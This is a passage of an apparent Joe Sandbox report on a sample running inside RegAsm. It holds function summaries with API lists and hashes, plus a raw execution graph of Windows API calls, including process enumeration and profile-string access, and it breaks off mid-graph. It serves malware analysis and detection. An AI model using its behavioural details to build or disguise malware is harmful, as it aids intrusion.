                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                                                  • String ID: pth_unenc
                                                                                                                                                                                                  • API String ID: 1872346434-4028850238
                                                                                                                                                                                                  • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                                                                                  • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                                                                                                                                  Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                  • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                                                                                                  Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                                                                                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                                                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:5.7%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                  Total number of Limit Nodes:59
                                                                                                                                                                                                  execution_graph 37899 44660a 37902 4465e4 37899->37902 37901 446613 37903 4465f3 __dllonexit 37902->37903 37904 4465ed _onexit 37902->37904 37903->37901 37904->37903 37717 442ec6 19 API calls 37894 4152c6 malloc 37895 4152e2 37894->37895 37896 4152ef 37894->37896 37898 416760 11 API calls 37896->37898 37898->37895 37905 4466f4 37924 446904 37905->37924 37907 446700 GetModuleHandleA 37910 446710 __set_app_type __p__fmode __p__commode 37907->37910 37909 4467a4 37911 4467ac __setusermatherr 37909->37911 37912 4467b8 37909->37912 37910->37909 37911->37912 37925 4468f0 _controlfp 37912->37925 37914 4467bd _initterm GetEnvironmentStringsW _initterm 37915 44681e GetStartupInfoW 37914->37915 37916 446810 37914->37916 37918 446866 GetModuleHandleA 37915->37918 37926 41276d 37918->37926 37922 446896 exit 37923 44689d _cexit 37922->37923 37923->37916 37924->37907 37925->37914 37927 41277d 37926->37927 37969 4044a4 LoadLibraryW 37927->37969 37929 412785 37930 412789 37929->37930 37975 414b81 37929->37975 37930->37922 37930->37923 37933 4127c8 37979 412465 memset ??2@YAPAXI 37933->37979 37935 4127ea 37991 40ac21 37935->37991 37940 412813 38009 40dd07 memset 37940->38009 37941 412827 38014 40db69 memset 37941->38014 37944 412822 38036 4125b6 ??3@YAXPAX DeleteObject 37944->38036 37946 40ada2 _wcsicmp 37948 41283d 37946->37948 37948->37944 37951 412863 CoInitialize 37948->37951 38019 41268e 37948->38019 37949 412966 38037 40b1ab free free 37949->38037 38035 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37951->38035 37954 41296f 38038 40b633 37954->38038 37956 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37961 412957 CoUninitialize 37956->37961 37966 4128ca 37956->37966 37961->37944 37962 4128d0 TranslateAcceleratorW 37963 412941 GetMessageW 37962->37963 37962->37966 37963->37961 37963->37962 37964 412909 IsDialogMessageW 37964->37963 37964->37966 37965 4128fd IsDialogMessageW 37965->37963 37965->37964 37966->37962 37966->37964 37966->37965 37967 41292b TranslateMessage DispatchMessageW 37966->37967 37968 41291f IsDialogMessageW 37966->37968 37967->37963 37968->37963 37968->37967 37970 4044f3 37969->37970 37974 4044cf FreeLibrary 37969->37974 37972 404507 MessageBoxW 37970->37972 37973 40451e 37970->37973 37972->37929 37973->37929 37974->37970 37976 414b8a 37975->37976 37977 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37975->37977 38042 40a804 memset 37976->38042 37977->37933 37980 4124e0 37979->37980 37981 412505 ??2@YAPAXI 37980->37981 37982 41251c 37981->37982 37984 412521 37981->37984 38064 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37982->38064 38053 444722 37984->38053 37990 41259b wcscpy 37990->37935 38069 40b1ab free free 37991->38069 37995 40a9ce malloc memcpy free free 37997 40ac5c 37995->37997 37996 40ad4b 38004 40ad76 37996->38004 38093 40a9ce 37996->38093 37997->37995 37997->37996 37999 40ace7 free 37997->37999 37997->38004 38073 40a8d0 37997->38073 38085 4099f4 37997->38085 37999->37997 38003 40a8d0 7 API calls 38003->38004 38070 40aa04 38004->38070 38005 40ada2 38006 40adc9 38005->38006 38008 40adaa 38005->38008 38006->37940 38006->37941 38007 40adb3 _wcsicmp 38007->38006 38007->38008 38008->38006 38008->38007 38098 40dce0 38009->38098 38011 40dd3a GetModuleHandleW 38103 40dba7 38011->38103 38015 40dce0 3 API calls 38014->38015 38016 40db99 38015->38016 38175 40dae1 38016->38175 38189 402f3a 38019->38189 38021 4126a8 38022 412766 38021->38022 38023 4126d3 _wcsicmp 38021->38023 38025 41270a 38021->38025 38224 4125f8 7 API calls 38021->38224 38022->37944 38022->37951 38023->38021 38025->38022 38192 411ac5 38025->38192 38035->37956 38036->37949 38037->37954 38039 40b640 38038->38039 38040 40b639 free 38038->38040 38041 40b1ab free free 38039->38041 38040->38039 38041->37930 38043 40a83b GetSystemDirectoryW 38042->38043 38044 40a84c wcscpy 38042->38044 38043->38044 38049 409719 wcslen 38044->38049 38047 40a881 LoadLibraryW 38048 40a886 38047->38048 38048->37977 38050 409724 38049->38050 38051 409739 wcscat LoadLibraryW 38049->38051 38050->38051 38052 40972c wcscat 38050->38052 38051->38047 38051->38048 38052->38051 38054 444732 38053->38054 38055 444728 DeleteObject 38053->38055 38065 409cc3 38054->38065 38055->38054 38057 412551 38058 4010f9 38057->38058 38059 401130 38058->38059 38060 401134 GetModuleHandleW LoadIconW 38059->38060 38061 401107 wcsncat 38059->38061 38062 40a7be 38060->38062 38061->38059 38063 40a7d2 38062->38063 38063->37990 38063->38063 38064->37984 38068 409bfd memset wcscpy 38065->38068 38067 409cdb CreateFontIndirectW 38067->38057 38068->38067 38069->37997 38071 40aa14 38070->38071 38072 40aa0a free 38070->38072 38071->38005 38072->38071 38074 40a8eb 38073->38074 38075 40a8df wcslen 38073->38075 38076 40a906 free 38074->38076 38077 40a90f 38074->38077 38075->38074 38078 40a919 38076->38078 38079 4099f4 3 API calls 38077->38079 38080 40a932 38078->38080 38081 40a929 free 38078->38081 38079->38078 38083 4099f4 3 API calls 38080->38083 38082 40a93e memcpy 38081->38082 38082->37997 38084 40a93d 38083->38084 38084->38082 38086 409a41 38085->38086 38087 4099fb malloc 38085->38087 38086->37997 38089 409a37 38087->38089 38090 409a1c 38087->38090 38089->37997 38091 409a30 free 38090->38091 38092 409a20 memcpy 38090->38092 38091->38089 38092->38091 38094 40a9e7 38093->38094 38095 40a9dc free 38093->38095 38096 4099f4 3 API calls 38094->38096 38097 40a9f2 38095->38097 38096->38097 38097->38003 38122 409bca GetModuleFileNameW 38098->38122 38100 40dce6 wcsrchr 38101 40dcf5 38100->38101 38102 40dcf9 wcscat 38100->38102 38101->38102 38102->38011 38123 44db70 38103->38123 38107 40dbfd 38126 4447d9 38107->38126 38110 40dc34 wcscpy wcscpy 38152 40d6f5 38110->38152 38111 40dc1f wcscpy 38111->38110 38114 40d6f5 3 API calls 38115 40dc73 38114->38115 38116 40d6f5 3 API calls 38115->38116 38117 40dc89 38116->38117 38118 40d6f5 3 API calls 38117->38118 38119 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38118->38119 38158 40da80 38119->38158 38122->38100 38124 40dbb4 memset memset 38123->38124 38125 409bca GetModuleFileNameW 38124->38125 38125->38107 38128 4447f4 38126->38128 38127 40dc1b 38127->38110 38127->38111 38128->38127 38129 444807 ??2@YAPAXI 38128->38129 38130 44481f 38129->38130 38131 444873 _snwprintf 38130->38131 38132 4448ab wcscpy 38130->38132 38165 44474a 8 API calls 38131->38165 38134 4448bb 38132->38134 38166 44474a 8 API calls 38134->38166 38135 4448a7 38135->38132 38135->38134 38137 4448cd 38167 44474a 8 API calls 38137->38167 38139 4448e2 38168 44474a 8 API calls 38139->38168 38141 4448f7 38169 44474a 8 API calls 38141->38169 38143 44490c 38170 44474a 8 API calls 38143->38170 38145 444921 38171 44474a 8 API calls 38145->38171 38147 444936 38172 44474a 8 API calls 38147->38172 38149 44494b 38173 44474a 8 API calls 38149->38173 38151 444960 ??3@YAXPAX 38151->38127 38153 44db70 38152->38153 38154 40d702 memset GetPrivateProfileStringW 38153->38154 38155 40d752 38154->38155 38156 40d75c WritePrivateProfileStringW 38154->38156 38155->38156 38157 40d758 38155->38157 38156->38157 38157->38114 38159 44db70 38158->38159 38160 40da8d memset 38159->38160 38161 40daac LoadStringW 38160->38161 38162 40dac6 38161->38162 38162->38161 38163 40dade 38162->38163 38174 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38162->38174 38163->37944 38165->38135 38166->38137 38167->38139 38168->38141 38169->38143 38170->38145 38171->38147 38172->38149 38173->38151 38174->38162 38185 409b98 GetFileAttributesW 38175->38185 38177 40daea 38178 40db63 38177->38178 38179 40daef wcscpy wcscpy GetPrivateProfileIntW 38177->38179 38178->37946 38186 40d65d GetPrivateProfileStringW 38179->38186 38181 40db3e 38187 40d65d GetPrivateProfileStringW 38181->38187 38183 40db4f 38188 40d65d GetPrivateProfileStringW 38183->38188 38185->38177 38186->38181 38187->38183 38188->38178 38225 40eaff 38189->38225 38193 411ae2 memset 38192->38193 38194 411b8f 38192->38194 38266 409bca GetModuleFileNameW 38193->38266 38206 411a8b 38194->38206 38196 411b0a wcsrchr 38197 411b22 wcscat 38196->38197 38198 411b1f 38196->38198 38267 414770 wcscpy wcscpy wcscpy CloseHandle 38197->38267 38198->38197 38200 411b67 38268 402afb 38200->38268 38204 411b7f 38324 40ea13 SendMessageW memset SendMessageW 38204->38324 38207 402afb 27 API calls 38206->38207 38208 411ac0 38207->38208 38209 4110dc 38208->38209 38210 4110f0 38209->38210 38211 41113e 38209->38211 38210->38211 38214 4110f7 _wcsicmp 38210->38214 38371 410c46 10 API calls 38210->38371 38349 40969c LoadCursorW SetCursor 38211->38349 38213 411143 38223 40b04b ??3@YAXPAX 38213->38223 38350 444a54 38213->38350 38353 4032b4 38213->38353 38214->38210 38215 411157 38216 40ada2 _wcsicmp 38215->38216 38219 411167 38216->38219 38217 4111af 38219->38217 38220 4111a6 qsort 38219->38220 38220->38217 38223->38215 38224->38021 38226 40eb10 38225->38226 38239 40e8e0 38226->38239 38229 40eb6c memcpy memcpy 38230 40ebe1 38229->38230 38237 40ebb7 38229->38237 38230->38229 38232 40ebf2 ??2@YAPAXI ??2@YAPAXI 38230->38232 38231 40d134 16 API calls 38231->38237 38233 40ec2e ??2@YAPAXI 38232->38233 38235 40ec65 38232->38235 38233->38235 38235->38235 38249 40ea7f 38235->38249 38237->38230 38237->38231 38238 402f49 38238->38021 38240 40e8f2 38239->38240 38241 40e8eb ??3@YAXPAX 38239->38241 38242 40e900 38240->38242 38243 40e8f9 ??3@YAXPAX 38240->38243 38241->38240 38244 40e911 38242->38244 38245 40e90a ??3@YAXPAX 38242->38245 38243->38242 38246 40e931 ??2@YAPAXI ??2@YAPAXI 38244->38246 38247 40e921 ??3@YAXPAX 38244->38247 38248 40e92a ??3@YAXPAX 38244->38248 38245->38244 38246->38229 38247->38248 38248->38246 38250 40aa04 free 38249->38250 38251 40ea88 38250->38251 38252 40aa04 free 38251->38252 38253 40ea90 38252->38253 38254 40aa04 free 38253->38254 38255 40ea98 38254->38255 38256 40aa04 free 38255->38256 38257 40eaa0 38256->38257 38258 40a9ce 4 API calls 38257->38258 38259 40eab3 38258->38259 38260 40a9ce 4 API calls 38259->38260 38261 40eabd 38260->38261 38262 40a9ce 4 API calls 38261->38262 38263 40eac7 38262->38263 38264 40a9ce 4 API calls 38263->38264 38265 40ead1 38264->38265 38265->38238 38266->38196 38267->38200 38325 40b2cc 38268->38325 38270 402b0a 38271 40b2cc 27 API calls 38270->38271 38272 402b23 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402b3a 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402b54 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402b6b 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402b82 38279->38280 38281 40b2cc 27 API calls 38280->38281 38282 402b99 38281->38282 38283 40b2cc 27 API calls 38282->38283 38284 402bb0 38283->38284 38285 40b2cc 27 API calls 38284->38285 38286 402bc7 38285->38286 38287 40b2cc 27 API calls 38286->38287 38288 402bde 38287->38288 38289 40b2cc 27 API calls 38288->38289 38290 402bf5 38289->38290 38291 40b2cc 27 API calls 38290->38291 38292 402c0c 38291->38292 38293 40b2cc 27 API calls 38292->38293 38294 402c23 38293->38294 38295 40b2cc 27 API calls 38294->38295 38296 402c3a 38295->38296 38297 40b2cc 27 API calls 38296->38297 38298 402c51 38297->38298 38299 40b2cc 27 API calls 38298->38299 38300 402c68 38299->38300 38301 40b2cc 27 API calls 38300->38301 38302 402c7f 38301->38302 38303 40b2cc 27 API calls 38302->38303 38304 402c99 38303->38304 38305 40b2cc 27 API calls 38304->38305 38306 402cb3 38305->38306 38307 40b2cc 27 API calls 38306->38307 38308 402cd5 38307->38308 38309 40b2cc 27 API calls 38308->38309 38310 402cf0 38309->38310 38311 40b2cc 27 API calls 38310->38311 38312 402d0b 38311->38312 38313 40b2cc 27 API calls 38312->38313 38314 402d26 38313->38314 38315 40b2cc 27 API calls 38314->38315 38316 402d3e 38315->38316 38317 40b2cc 27 API calls 38316->38317 38318 402d59 38317->38318 38319 40b2cc 27 API calls 38318->38319 38320 402d78 38319->38320 38321 40b2cc 27 API calls 38320->38321 38322 402d93 38321->38322 38323 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38322->38323 38323->38204 38324->38194 38328 40b58d 38325->38328 38327 40b2d1 38327->38270 38329 40b5a4 GetModuleHandleW FindResourceW 38328->38329 38330 40b62e 38328->38330 38331 40b5c2 LoadResource 38329->38331 38332 40b5e7 38329->38332 38330->38327 38331->38332 38333 40b5d0 SizeofResource LockResource 38331->38333 38332->38330 38341 40afcf 38332->38341 38333->38332 38335 40b608 memcpy 38344 40b4d3 memcpy 38335->38344 38337 40b61e 38345 40b3c1 18 API calls 38337->38345 38339 40b626 38346 40b04b 38339->38346 38342 40b04b ??3@YAXPAX 38341->38342 38343 40afd7 ??2@YAPAXI 38342->38343 38343->38335 38344->38337 38345->38339 38347 40b051 ??3@YAXPAX 38346->38347 38348 40b05f 38346->38348 38347->38348 38348->38330 38349->38213 38351 444a64 FreeLibrary 38350->38351 38352 444a83 38350->38352 38351->38352 38352->38215 38354 4032c4 38353->38354 38355 40b633 free 38354->38355 38356 403316 38355->38356 38372 44553b 38356->38372 38360 403480 38570 40368c 15 API calls 38360->38570 38362 403489 38363 40b633 free 38362->38363 38364 403495 38363->38364 38364->38215 38365 4033a9 memset memcpy 38366 4033ec wcscmp 38365->38366 38367 40333c 38365->38367 38366->38367 38367->38360 38367->38365 38367->38366 38568 4028e7 11 API calls 38367->38568 38569 40f508 6 API calls 38367->38569 38370 403421 _wcsicmp 38370->38367 38371->38210 38373 445548 38372->38373 38374 445599 38373->38374 38571 40c768 38373->38571 38375 4455a8 memset 38374->38375 38383 4457f2 38374->38383 38655 403988 38375->38655 38381 4455e5 38389 445672 38381->38389 38400 44560f 38381->38400 38423 445854 38383->38423 38758 403e2d memset memset memset memset memset 38383->38758 38384 4458bb memset memset 38386 414c2e 16 API calls 38384->38386 38393 4458f9 38386->38393 38387 44557a 38394 44558c 38387->38394 38635 4136c0 38387->38635 38666 403fbe memset memset memset memset memset 38389->38666 38390 4459ed 38396 445a00 memset memset 38390->38396 38397 445b22 38390->38397 38391 44595e memset memset 38392 414c2e 16 API calls 38391->38392 38398 44599c 38392->38398 38399 40b2cc 27 API calls 38393->38399 38639 444b06 38394->38639 38407 414c2e 16 API calls 38396->38407 38403 445bca 38397->38403 38404 445b38 memset memset memset 38397->38404 38408 40b2cc 27 API calls 38398->38408 38409 445909 38399->38409 38411 4087b3 335 API calls 38400->38411 38402 445849 38849 40b1ab free free 38402->38849 38410 445c8b memset memset 38403->38410 38476 445cf0 38403->38476 38414 445bd4 38404->38414 38415 445b98 38404->38415 38416 445a3e 38407->38416 38424 4459ac 38408->38424 38420 409d1f 6 API calls 38409->38420 38425 414c2e 16 API calls 38410->38425 38421 445621 38411->38421 38413 44589f 38850 40b1ab free free 38413->38850 38804 414c2e 38414->38804 38415->38414 38427 445ba2 38415->38427 38430 40b2cc 27 API calls 38416->38430 38419 403335 38567 4452e5 43 API calls 38419->38567 38437 445919 38420->38437 38835 4454bf 20 API calls 38421->38835 38422 445823 38422->38402 38445 4087b3 335 API calls 38422->38445 38431 4458aa 38423->38431 38781 403c9c memset memset memset memset memset 38423->38781 38438 409d1f 6 API calls 38424->38438 38439 445cc9 38425->38439 38940 4099c6 wcslen 38427->38940 38428 4456b2 38837 40b1ab free free 38428->38837 38432 445a4f 38430->38432 38431->38384 38463 44594a 38431->38463 38442 409d1f 6 API calls 38432->38442 38435 445d3d 38462 40b2cc 27 API calls 38435->38462 38436 445d88 memset memset memset 38446 414c2e 16 API calls 38436->38446 38851 409b98 GetFileAttributesW 38437->38851 38447 4459bc 38438->38447 38448 409d1f 6 API calls 38439->38448 38440 445879 38440->38413 38458 4087b3 335 API calls 38440->38458 38451 445a63 38442->38451 38443 40b2cc 27 API calls 38452 445bf3 38443->38452 38445->38422 38455 445dde 38446->38455 38916 409b98 GetFileAttributesW 38447->38916 38457 445ce1 38448->38457 38449 445bb3 38943 445403 memset 38449->38943 38450 445680 38450->38428 38689 4087b3 memset 38450->38689 38460 40b2cc 27 API calls 38451->38460 38820 409d1f wcslen wcslen 38452->38820 38453 445928 38453->38463 38852 40b6ef 38453->38852 38464 40b2cc 27 API calls 38455->38464 38960 409b98 GetFileAttributesW 38457->38960 38458->38440 38469 445a94 38460->38469 38472 445d54 _wcsicmp 38462->38472 38463->38390 38463->38391 38475 445def 38464->38475 38465 4459cb 38465->38390 38484 40b6ef 249 API calls 38465->38484 38917 40ae18 38469->38917 38470 44566d 38470->38383 38740 413d4c 38470->38740 38481 445d71 38472->38481 38544 445d67 38472->38544 38474 445665 38836 40b1ab free free 38474->38836 38482 409d1f 6 API calls 38475->38482 38476->38419 38476->38435 38476->38436 38477 445389 255 API calls 38477->38403 38961 445093 23 API calls 38481->38961 38489 445e03 38482->38489 38484->38390 38485 4456d8 38491 40b2cc 27 API calls 38485->38491 38488 44563c 38488->38474 38494 4087b3 335 API calls 38488->38494 38962 409b98 GetFileAttributesW 38489->38962 38490 40b6ef 249 API calls 38490->38419 38496 4456e2 38491->38496 38492 40b2cc 27 API calls 38497 445c23 38492->38497 38493 445d83 38493->38419 38494->38488 38838 413fa6 _wcsicmp _wcsicmp 38496->38838 38501 409d1f 6 API calls 38497->38501 38499 445e12 38505 445e6b 38499->38505 38512 40b2cc 27 API calls 38499->38512 38503 445c37 38501->38503 38502 4456eb 38508 4456fd memset memset memset memset 38502->38508 38509 4457ea 38502->38509 38510 445389 255 API calls 38503->38510 38504 445b17 38937 40aebe 38504->38937 38964 445093 23 API calls 38505->38964 38839 409c70 wcscpy wcsrchr 38508->38839 38842 413d29 38509->38842 38515 445c47 38510->38515 38516 445e33 38512->38516 38513 445e7e 38518 445f67 38513->38518 38521 40b2cc 27 API calls 38515->38521 38522 409d1f 6 API calls 38516->38522 38527 40b2cc 27 API calls 38518->38527 38519 445ab2 memset 38523 40b2cc 27 API calls 38519->38523 38525 445c53 38521->38525 38526 445e47 38522->38526 38528 445aa1 38523->38528 38524 409c70 2 API calls 38529 44577e 38524->38529 38530 409d1f 6 API calls 38525->38530 38963 409b98 GetFileAttributesW 38526->38963 38532 445f73 38527->38532 38528->38504 38528->38519 38533 409d1f 6 API calls 38528->38533 38543 445389 255 API calls 38528->38543 38924 40add4 38528->38924 38929 40ae51 38528->38929 38534 409c70 2 API calls 38529->38534 38535 445c67 38530->38535 38537 409d1f 6 API calls 38532->38537 38533->38528 38539 44578d 38534->38539 38540 445389 255 API calls 38535->38540 38536 445e56 38536->38505 38542 445e83 memset 38536->38542 38538 445f87 38537->38538 38967 409b98 GetFileAttributesW 38538->38967 38539->38509 38546 40b2cc 27 API calls 38539->38546 38540->38403 38545 40b2cc 27 API calls 38542->38545 38543->38528 38544->38419 38544->38490 38547 445eab 38545->38547 38548 4457a8 38546->38548 38549 409d1f 6 API calls 38547->38549 38550 409d1f 6 API calls 38548->38550 38551 445ebf 38549->38551 38552 4457b8 38550->38552 38553 40ae18 9 API calls 38551->38553 38841 409b98 GetFileAttributesW 38552->38841 38563 445ef5 38553->38563 38555 4457c7 38555->38509 38557 4087b3 335 API calls 38555->38557 38556 40ae51 9 API calls 38556->38563 38557->38509 38558 445f5c 38560 40aebe FindClose 38558->38560 38559 40add4 2 API calls 38559->38563 38560->38518 38561 40b2cc 27 API calls 38561->38563 38562 409d1f 6 API calls 38562->38563 38563->38556 38563->38558 38563->38559 38563->38561 38563->38562 38565 445f3a 38563->38565 38965 409b98 GetFileAttributesW 38563->38965 38966 445093 23 API calls 38565->38966 38567->38367 38568->38370 38569->38367 38570->38362 38572 40c775 38571->38572 38968 40b1ab free free 38572->38968 38574 40c788 38969 40b1ab free free 38574->38969 38576 40c790 38970 40b1ab free free 38576->38970 38578 40c798 38579 40aa04 free 38578->38579 38580 40c7a0 38579->38580 38971 40c274 memset 38580->38971 38585 40a8ab 9 API calls 38586 40c7c3 38585->38586 38587 40a8ab 9 API calls 38586->38587 38588 40c7d0 38587->38588 39000 40c3c3 38588->39000 38592 40c877 38601 40bdb0 38592->38601 38593 40c86c 39028 4053fe 37 API calls 38593->39028 38596 40c813 _wcslwr 39026 40c634 47 API calls 38596->39026 38598 40c829 wcslen 38599 40c7e5 38598->38599 38599->38592 38599->38593 39025 40a706 wcslen memcpy 38599->39025 39027 40c634 47 API calls 38599->39027 39162 404363 38601->39162 38606 40b2cc 27 API calls 38607 40be02 wcslen 38606->38607 38608 40bf5d 38607->38608 38616 40be1e 38607->38616 39179 40440c 38608->39179 38609 40be26 wcsncmp 38609->38616 38612 40be7d memset 38613 40bea7 memcpy 38612->38613 38612->38616 38614 40bf11 wcschr 38613->38614 38613->38616 38614->38616 38615 40b2cc 27 API calls 38617 40bef6 _wcsnicmp 38615->38617 38616->38608 38616->38609 38616->38612 38616->38613 38616->38614 38616->38615 38618 40bf43 LocalFree 38616->38618 39182 40bd5d 28 API calls 38616->39182 39183 404423 38616->39183 38617->38614 38617->38616 38618->38616 38619 4135f7 39195 4135e0 38619->39195 38622 40b2cc 27 API calls 38623 41360d 38622->38623 38624 40a804 8 API calls 38623->38624 38625 413613 38624->38625 38626 41363e 38625->38626 38627 40b273 27 API calls 38625->38627 38628 4135e0 FreeLibrary 38626->38628 38629 413625 38627->38629 38630 413643 38628->38630 38629->38626 38631 413648 38629->38631 38630->38387 38632 413658 38631->38632 38633 4135e0 FreeLibrary 38631->38633 38632->38387 38634 413666 38633->38634 38634->38387 38637 4136e2 38635->38637 38636 413827 38834 41366b FreeLibrary 38636->38834 38637->38636 38638 4137ac CoTaskMemFree 38637->38638 38638->38637 39198 4449b9 38639->39198 38642 444c1f 38642->38374 38643 4449b9 35 API calls 38645 444b4b 38643->38645 38644 444c15 38647 4449b9 35 API calls 38644->38647 38645->38644 39218 444972 GetVersionExW 38645->39218 38647->38642 38648 444b99 memcmp 38653 444b8c 38648->38653 38649 444c0b 39222 444a85 35 API calls 38649->39222 38653->38648 38653->38649 39219 444aa5 35 API calls 38653->39219 39220 40a7a0 GetVersionExW 38653->39220 39221 444a85 35 API calls 38653->39221 38656 40399d 38655->38656 39223 403a16 38656->39223 38658 403a09 39237 40b1ab free free 38658->39237 38660 4039a3 38660->38658 38664 4039f4 38660->38664 39234 40a02c CreateFileW 38660->39234 38661 403a12 wcsrchr 38661->38381 38664->38658 38665 4099c6 2 API calls 38664->38665 38665->38658 38667 414c2e 16 API calls 38666->38667 38668 404048 38667->38668 38669 414c2e 16 API calls 38668->38669 38670 404056 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 404073 38671->38672 38673 409d1f 6 API calls 38672->38673 38674 40408e 38673->38674 38675 409d1f 6 API calls 38674->38675 38676 4040a6 38675->38676 38677 403af5 20 API calls 38676->38677 38678 4040ba 38677->38678 38679 403af5 20 API calls 38678->38679 38680 4040cb 38679->38680 39264 40414f memset 38680->39264 38682 4040e0 38683 404140 38682->38683 38685 4040ec memset 38682->38685 38687 4099c6 2 API calls 38682->38687 38688 40a8ab 9 API calls 38682->38688 39278 40b1ab free free 38683->39278 38685->38682 38686 404148 38686->38450 38687->38682 38688->38682 39291 40a6e6 WideCharToMultiByte 38689->39291 38691 4087ed 39292 4095d9 memset 38691->39292 38694 408809 memset memset memset memset memset 38695 40b2cc 27 API calls 38694->38695 38696 4088a1 38695->38696 38697 409d1f 6 API calls 38696->38697 38698 4088b1 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 4088c0 38699->38700 38701 409d1f 6 API calls 38700->38701 38702 4088d0 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 4088df 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 4088ef 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 4088fe 38707->38708 38709 409d1f 6 API calls 38708->38709 38710 40890e 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 40891d 38711->38712 38713 409d1f 6 API calls 38712->38713 38738 408953 38738->38450 38741 40b633 free 38740->38741 38742 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38741->38742 38743 413f00 Process32NextW 